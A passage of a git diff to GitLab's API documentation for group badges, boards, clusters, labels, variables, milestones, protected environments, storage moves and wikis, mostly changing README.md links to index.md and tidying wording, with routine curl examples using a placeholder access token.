[`IterationWildcardId`](#iterationwildcardid) | Filter by negated iteration ID wildcard. | | <a id="negatedissuefilterinputlabelname"></a>`labelName` | [`[String!]`](#string) | Labels not applied to this issue. | diff --git a/doc/api/graphql/sample_issue_boards.md b/doc/api/graphql/sample_issue_boards.md index 86881465ed6..68c12aa26a2 100644 --- a/doc/api/graphql/sample_issue_boards.md +++ b/doc/api/graphql/sample_issue_boards.md @@ -4,10 +4,10 @@ group: Project Management info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Identify issue boards with GraphQL +# Identify issue boards with GraphQL **(FREE)** This page describes how you can use the GraphiQL explorer to identify -existing issue boards in the `gitlab-docs` documentation repository. +existing [issue boards](../../user/project/issue_board.md) in the `gitlab-docs` documentation repository. ## Set up the GraphiQL explorer diff --git a/doc/api/group_badges.md b/doc/api/group_badges.md index 63ba71797fc..463507bf583 100644 --- a/doc/api/group_badges.md +++ b/doc/api/group_badges.md @@ -34,7 +34,7 @@ GET /groups/:id/badges | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `name` | string | no | Name of the badges to return (case-sensitive). | ```shell @@ -67,7 +67,7 @@ GET /groups/:id/badges/:badge_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `badge_id` | integer | yes | The badge ID | ```shell @@ -97,7 +97,7 @@ POST /groups/:id/badges | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `link_url` | string | yes | URL of the badge link | | `image_url` | string | yes | URL of the badge image | @@ -130,7 +130,7 @@ PUT /groups/:id/badges/:badge_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `badge_id` | integer | yes | The badge ID | | `link_url` | string | no | URL of the badge link | | `image_url` | string | no | URL of the badge image | @@ -163,7 +163,7 @@ DELETE /groups/:id/badges/:badge_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `badge_id` | integer | yes | The badge ID | ```shell @@ -180,7 +180,7 @@ GET /groups/:id/badges/render | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `link_url` | string | yes | URL of the badge link| | `image_url` | string | yes | URL of the badge image | diff --git a/doc/api/group_boards.md b/doc/api/group_boards.md index a0121388194..eaa7b57e520 100644 --- a/doc/api/group_boards.md +++ b/doc/api/group_boards.md @@ -4,16 +4,16 @@ group: Project Management info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Group Issue Boards API +# Group issue boards API **(FREE)** -Every API call to group boards must be authenticated. +Every API call to [group issue boards](../user/project/issue_board.md#group-issue-boards) must be authenticated. If a user is not a member of a group and the group is private, a `GET` request results in `404` status code. ## List all group issue boards in a group -Lists Issue Boards in the given group. +Lists issue boards in the given group. ```plaintext GET /groups/:id/boards @@ -21,7 +21,7 @@ GET /groups/:id/boards | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | ```shell curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/groups/5/boards" @@ -138,7 +138,7 @@ GET /groups/:id/boards/:board_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `board_id` | integer | yes | The ID of a board | ```shell @@ -252,7 +252,7 @@ POST /groups/:id/boards | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `name` | string | yes | The name of the new board | ```shell @@ -291,7 +291,7 @@ PUT /groups/:id/boards/:board_id | Attribute | Type | Required | Description | | ---------------------------- | -------------- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `board_id` | integer | yes | The ID of a board | | `name` | string | no | The new name of the board | | `hide_backlog_list` | boolean | no | Hide the Open list | @@ -359,7 +359,7 @@ DELETE /groups/:id/boards/:board_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `board_id` | integer | yes | The ID of a board | ```shell @@ -377,7 +377,7 @@ GET /groups/:id/boards/:board_id/lists | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `board_id` | integer | yes | The ID of a board | ```shell @@ -428,7 +428,7 @@ GET /groups/:id/boards/:board_id/lists/:list_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `board_id` | integer | yes | The ID of a board | | `list_id` | integer | yes | The ID of a board's list | @@ -460,7 +460,7 @@ POST /groups/:id/boards/:board_id/lists | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `board_id` | integer | yes | The ID of a board | | `label_id` | integer | yes | The ID of a label | @@ -501,7 +501,7 @@ PUT /groups/:id/boards/:board_id/lists/:list_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `board_id` | integer | yes | The ID of a board | | `list_id` | integer | yes | The ID of a board's list | | `position` | integer | yes | The position of the list | @@ -534,7 +534,7 @@ DELETE /groups/:id/boards/:board_id/lists/:list_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `board_id` | integer | yes | The ID of a board | | `list_id` | integer | yes | The ID of a board's list | diff --git a/doc/api/group_clusters.md b/doc/api/group_clusters.md index 6853e38cc32..83373368fc6 100644 --- a/doc/api/group_clusters.md +++ b/doc/api/group_clusters.md @@ -27,7 +27,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | -------------- | -------- | ----------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | Example request: @@ -96,7 +96,7 @@ Parameters: | Attribute | Type | Required | Description | | ------------ | -------------- | -------- | ----------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `cluster_id` | integer | yes | The ID of the cluster | Example request: @@ -165,7 +165,7 @@ Parameters: | Attribute | Type | Required | Description | | ---------------------------------------------------- | -------------- | -------- | --------------------------------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `name` | string | yes | The name of the cluster | | `domain` | string | no | The [base domain](../user/group/clusters/index.md#base-domain) of the cluster | | `management_project_id` | integer | no | The ID of the [management project](../user/clusters/management_project.md) for the cluster | @@ -236,7 +236,7 @@ Parameters: | Attribute | Type | Required | Description | | ----------------------------------------- | -------------- | -------- | ------------------------------------------------------------------------------------------ | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `cluster_id` | integer | yes | The ID of the cluster | | `name` | string | no | The name of the cluster | | `domain` | string | no | The [base domain](../user/group/clusters/index.md#base-domain) of the cluster | @@ -258,7 +258,7 @@ Example request: ```shell curl --header "Private-Token: <your_access_token>" "https://gitlab.example.com/api/v4/groups/26/clusters/24" \ -H "Content-Type:application/json" \ ---request PUT --data '{"name":"new-cluster-name","domain":"new-domain.com","api_url":"https://new-api-url.com"}' +--request PUT --data '{"name":"new-cluster-name","domain":"new-domain.com","platform_kubernetes_attributes":{"api_url":"https://10.10.101.1:6433"}}' ``` Example response: @@ -321,7 +321,7 @@ Parameters: | Attribute | Type | Required | Description | | ------------ | -------------- | -------- | ----------------------------------------------------------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `cluster_id` | integer | yes | The ID of the cluster | Example request: diff --git a/doc/api/group_iterations.md b/doc/api/group_iterations.md index 3d72e035383..af27b558dfe 100644 --- a/doc/api/group_iterations.md +++ b/doc/api/group_iterations.md @@ -26,7 +26,7 @@ GET /groups/:id/iterations?search=version | Attribute | Type | Required | Description | | ------------------- | ------- | -------- | ----------- | -| `state` | string | no | Return only `opened`, `upcoming`, `started`, `closed`, or `all` iterations. Defaults to `all`. | +| `state` | string | no | 'Return `opened`, `upcoming`, `current (previously started)`, `closed`, or `all` iterations. Filtering by `started` state is deprecated starting with 14.1, please use `current` instead.' | | `search` | string | no | Return only iterations with a title matching the provided string. | | `include_ancestors` | boolean | no | Include iterations from parent group and its ancestors. Defaults to `true`. | diff --git a/doc/api/group_labels.md b/doc/api/group_labels.md index 2aca98259e0..25102e32360 100644 --- a/doc/api/group_labels.md +++ b/doc/api/group_labels.md @@ -4,11 +4,13 @@ group: Project Management info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Group Labels API +# Group labels API **(FREE)** > [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/21368) in GitLab 11.8. -This API supports managing of [group labels](../user/project/labels.md#project-labels-and-group-labels). It allows to list, create, update, and delete group labels. Furthermore, users can subscribe and unsubscribe to and from group labels. +This API supports managing [group labels](../user/project/labels.md#project-labels-and-group-labels). +It allows users to list, create, update, and delete group labels. Furthermore, users can subscribe to and +unsubscribe from group labels. NOTE: The `description_html` - was added to response JSON in [GitLab 12.7](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/21413). @@ -23,7 +25,7 @@ GET /groups/:id/labels | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user. | | `with_counts` | boolean | no | Whether or not to include issue and merge request counts. Defaults to `false`. _([Introduced in GitLab 12.2](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/31543))_ | | `include_ancestor_groups` | boolean | no | Include ancestor groups. Defaults to `true`. | | `include_descendant_groups` | boolean | no | Include descendant groups. Defaults to `false`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/259024) in GitLab 13.6 | @@ -75,7 +77,7 @@ GET /groups/:id/labels/:label_id | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user. | | `label_id` | integer or string | yes | The ID or title of a group's label. | | `include_ancestor_groups` | boolean | no | Include ancestor groups. Defaults to `true`. | | `include_descendant_groups` | boolean | no | Include descendant groups. Defaults to `false`. [Introduced](https://gitlab.com/gitlab-org/gitlab/-/issues/259024) in GitLab 13.6 | @@ -112,9 +114,9 @@ POST /groups/:id/labels | Attribute | Type | Required | Description | | ------------- | ------- | -------- | ---------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `name` | string | yes | The name of the label | -| `color` | string | yes | The color of the label given in 6-digit hex notation with leading '#' sign (e.g. #FFAABB) or one of the [CSS color names](https://developer.mozilla.org/en-US/docs/Web/CSS/color_value#Color_keywords) | +| `color` | string | yes | The color of the label given in 6-digit hex notation with leading '#' sign (for example, #FFAABB) or one of the [CSS color names](https://developer.mozilla.org/en-US/docs/Web/CSS/color_value#Color_keywords) | | `description` | string | no | The description of the label, | ```shell @@ -150,10 +152,10 @@ PUT /groups/:id/labels/:label_id | Attribute | Type | Required | Description | | ------------- | ------- | -------- | ---------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `label_id` | integer or string | yes | The ID or title of a group's label. | | `new_name` | string | no | The new name of the label | -| `color` | string | no | The color of the label given in 6-digit hex notation with leading '#' sign (e.g. #FFAABB) or one of the [CSS color names](https://developer.mozilla.org/en-US/docs/Web/CSS/color_value#Color_keywords) | +| `color` | string | no | The color of the label given in 6-digit hex notation with leading '#' sign (for example, #FFAABB) or one of the [CSS color names](https://developer.mozilla.org/en-US/docs/Web/CSS/color_value#Color_keywords) | | `description` | string | no | The description of the label. | ```shell @@ -191,7 +193,7 @@ DELETE /groups/:id/labels/:label_id | Attribute | Type | Required | Description | | --------- | ------- | -------- | --------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `label_id` | integer or string | yes | The ID or title of a group's label. | ```shell @@ -212,7 +214,7 @@ POST /groups/:id/labels/:label_id/subscribe | Attribute | Type | Required | Description | | ---------- | ----------------- | -------- | ------------------------------------ | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `label_id` | integer or string | yes | The ID or title of a group's label. | ```shell @@ -248,7 +250,7 @@ POST /groups/:id/labels/:label_id/unsubscribe | Attribute | Type | Required | Description | | ---------- | ----------------- | -------- | ------------------------------------ | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `label_id` | integer or string | yes | The ID or title of a group's label. | ```shell diff --git a/doc/api/group_level_variables.md b/doc/api/group_level_variables.md index 6425e022170..f816f2dc173 100644 --- a/doc/api/group_level_variables.md +++ b/doc/api/group_level_variables.md @@ -18,7 +18,7 @@ GET /groups/:id/variables | Attribute | Type | required | Description | |-----------|---------|----------|---------------------| -| `id` | integer/string | yes | The ID of a group or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID of a group or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | ```shell curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/groups/1/variables" @@ -55,7 +55,7 @@ GET /groups/:id/variables/:key | Attribute | Type | required | Description | |-----------|---------|----------|-----------------------| -| `id` | integer/string | yes | The ID of a group or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID of a group or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `key` | string | yes | The `key` of a variable | ```shell @@ -83,13 +83,13 @@ POST /groups/:id/variables | Attribute | Type | required | Description | |-----------------|---------|----------|-----------------------| -| `id` | integer/string | yes | The ID of a group or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID of a group or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `key` | string | yes | The `key` of a variable; must have no more than 255 characters; only `A-Z`, `a-z`, `0-9`, and `_` are allowed | | `value` | string | yes | The `value` of a variable | | `variable_type` | string | no | The type of a variable. Available types are: `env_var` (default) and `file` | | `protected` | boolean | no | Whether the variable is protected | | `masked` | boolean | no | Whether the variable is masked | -| `environment_scope` **(PREMIUM)** | string | no | The [environment scope](../ci/variables/README.md#limit-the-environment-scope-of-a-cicd-variable) of a variable | +| `environment_scope` **(PREMIUM)** | string | no | The [environment scope](../ci/variables/index.md#limit-the-environment-scope-of-a-cicd-variable) of a variable | ```shell curl --request POST --header "PRIVATE-TOKEN: <your_access_token>" \ @@ -117,13 +117,13 @@ PUT /groups/:id/variables/:key | Attribute | Type | required | Description | |-----------------|---------|----------|-------------------------| -| `id` | integer/string | yes | The ID of a group or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID of a group or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `key` | string | yes | The `key` of a variable | | `value` | string | yes | The `value` of a variable | | `variable_type` | string | no | The type of a variable. Available types are: `env_var` (default) and `file` | | `protected` | boolean | no | Whether the variable is protected | | `masked` | boolean | no | Whether the variable is masked | -| `environment_scope` **(PREMIUM)** | string | no | The [environment scope](../ci/variables/README.md#limit-the-environment-scope-of-a-cicd-variable) of a variable | +| `environment_scope` **(PREMIUM)** | string | no | The [environment scope](../ci/variables/index.md#limit-the-environment-scope-of-a-cicd-variable) of a variable | ```shell curl --request PUT --header "PRIVATE-TOKEN: <your_access_token>" \ @@ -151,7 +151,7 @@ DELETE /groups/:id/variables/:key | Attribute | Type | required | Description | |-----------|---------|----------|-------------------------| -| `id` | integer/string | yes | The ID of a group or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID of a group or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `key` | string | yes | The `key` of a variable | ```shell diff --git a/doc/api/group_milestones.md b/doc/api/group_milestones.md index 40d51f90b5a..a21af94da40 100644 --- a/doc/api/group_milestones.md +++ b/doc/api/group_milestones.md @@ -4,11 +4,9 @@ group: Project Management info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Group milestones API +# Group milestones API **(FREE)** -> [Introduced](https://gitlab.com/gitlab-org/gitlab-foss/-/merge_requests/12819) in GitLab 9.5. - -This page describes the group milestones API. +Use the group [milestones](../user/project/milestones/index.md) using the REST API. There's a separate [project milestones API](milestones.md) page. ## List group milestones @@ -29,7 +27,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | ------ | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `iids[]` | integer array | no | Return only the milestones having the given `iid` (Note: ignored if `include_parent_milestones` is set as `true`) | | `state` | string | no | Return only `active` or `closed` milestones | | `title` | string | no | Return only the milestones having the given `title` | @@ -73,7 +71,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | ------ | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `milestone_id` | integer | yes | The ID of the group milestone | ## Create new milestone @@ -88,7 +86,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | ------ | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `title` | string | yes | The title of a milestone | | `description` | string | no | The description of the milestone | | `due_date` | date | no | The due date of the milestone, in YYYY-MM-DD format (ISO 8601) | @@ -106,7 +104,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | ------ | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `milestone_id` | integer | yes | The ID of a group milestone | | `title` | string | no | The title of a milestone | | `description` | string | no | The description of a milestone | @@ -116,7 +114,7 @@ Parameters: ## Delete group milestone -Only for users with Developer access to the group. +Only for users with the Developer role in the group. ```plaintext DELETE /groups/:id/milestones/:milestone_id @@ -126,7 +124,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | ------ | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `milestone_id` | integer | yes | The ID of the group's milestone | ## Get all issues assigned to a single milestone @@ -141,7 +139,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | ------ | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `milestone_id` | integer | yes | The ID of a group milestone | Currently, this API endpoint doesn't return issues from any subgroups. @@ -161,7 +159,7 @@ Parameters: | Attribute | Type | Required | Description | | --------- | ------ | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `milestone_id` | integer | yes | The ID of a group milestone | ## Get all burndown chart events for a single milestone **(PREMIUM)** @@ -179,5 +177,5 @@ Parameters: | Attribute | Type | Required | Description | | --------- | ------ | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) owned by the authenticated user | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) owned by the authenticated user | | `milestone_id` | integer | yes | The ID of a group milestone | diff --git a/doc/api/group_protected_environments.md b/doc/api/group_protected_environments.md index d4e27a7200a..ce5803fed3c 100644 --- a/doc/api/group_protected_environments.md +++ b/doc/api/group_protected_environments.md @@ -40,7 +40,7 @@ GET /groups/:id/protected_environments | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) maintained by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) maintained by the authenticated user. | ```shell curl --header "PRIVATE-TOKEN: <your_access_token>" "https://gitlab.example.com/api/v4/groups/5/protected_environments/" @@ -74,7 +74,7 @@ GET /groups/:id/protected_environments/:name | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) maintained by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) maintained by the authenticated user. | | `name` | string | yes | The deployment tier of the protected environment. One of `production`, `staging`, `testing`, `development`, or `other`. Read more about [deployment tiers](../ci/environments/index.md#deployment-tier-of-environments).| ```shell @@ -107,7 +107,7 @@ POST /groups/:id/protected_environments | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) maintained by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) maintained by the authenticated user. | | `name` | string | yes | The deployment tier of the protected environment. One of `production`, `staging`, `testing`, `development`, or `other`. Read more about [deployment tiers](../ci/environments/index.md#deployment-tier-of-environments).| | `deploy_access_levels` | array | yes | Array of access levels allowed to deploy, with each described by a hash. One of `user_id`, `group_id` or `access_level`. They take the form of `{user_id: integer}`, `{group_id: integer}` or `{access_level: integer}` respectively. | @@ -144,7 +144,7 @@ DELETE /groups/:id/protected_environments/:name | Attribute | Type | Required | Description | | --------- | ---- | -------- | ----------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) maintained by the authenticated user. | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) maintained by the authenticated user. | | `name` | string | yes | The deployment tier of the protected environment. One of `production`, `staging`, `testing`, `development`, or `other`. Read more about [deployment tiers](../ci/environments/index.md#deployment-tier-of-environments).| ```shell diff --git a/doc/api/group_repository_storage_moves.md b/doc/api/group_repository_storage_moves.md index 2373fa25e15..53afe8d5ef3 100644 --- a/doc/api/group_repository_storage_moves.md +++ b/doc/api/group_repository_storage_moves.md @@ -16,19 +16,19 @@ example, or to migrate a Group Wiki. As group repository storage moves are processed, they transition through different states. Values of `state` are: -- `initial` -- `scheduled` -- `started` -- `finished` -- `failed` -- `replicated` -- `cleanup failed` +- `initial`: The record has been created but the background job has not yet been scheduled. +- `scheduled`: The background job has been scheduled. +- `started`: The group repositories are being copied to the destination storage. +- `replicated`: The group has been moved. +- `failed`: The group repositories failed to copy or the checksums did not match. +- `finished`: The group has been moved and the repositories on the source storage have been deleted. +- `cleanup failed`: The group has been moved but the repositories on the source storage could not be deleted. To ensure data integrity, groups are put in a temporary read-only state for the duration of the move. During this time, users receive a `The repository is temporarily read-only. Please try again later.` message if they try to push new commits. -This API requires you to [authenticate yourself](README.md#authentication) as an administrator. +This API requires you to [authenticate yourself](index.md#authentication) as an administrator. For other type of repositories you can read: @@ -42,7 +42,7 @@ GET /group_repository_storage_moves ``` By default, `GET` requests return 20 results at a time because the API results -are [paginated](README.md#pagination). +are [paginated](index.md#pagination). Example request: @@ -78,7 +78,7 @@ GET /groups/:group_id/repository_storage_moves ``` By default, `GET` requests return 20 results at a time because the API results -are [paginated](README.md#pagination). +are [paginated](index.md#pagination). Supported attributes: diff --git a/doc/api/group_wikis.md b/doc/api/group_wikis.md index 58192425786..e1470a2cdd7 100644 --- a/doc/api/group_wikis.md +++ b/doc/api/group_wikis.md @@ -22,7 +22,7 @@ GET /groups/:id/wikis | Attribute | Type | Required | Description | | --------- | ------- | -------- | --------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `with_content` | boolean | no | Include pages' content | ```shell @@ -63,7 +63,7 @@ GET /groups/:id/wikis/:slug | Attribute | Type | Required | Description | | --------- | ------- | -------- | --------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the group](index.md#namespaced-path-encoding) | | `slug` | string | yes | URL-encoded slug (a unique string) of the wiki page, such as `dir%2Fpage_name` | ```shell @@ -91,7 +91,7 @@ POST /projects/:id/wikis | Attribute | Type | Required | Description | | ------------- | ------- | -------- | ---------------------------- | -| `id` | integer/string | yes | The ID or [URL-encoded path of the group](README.md#namespaced-path-encoding) | +| `id` | 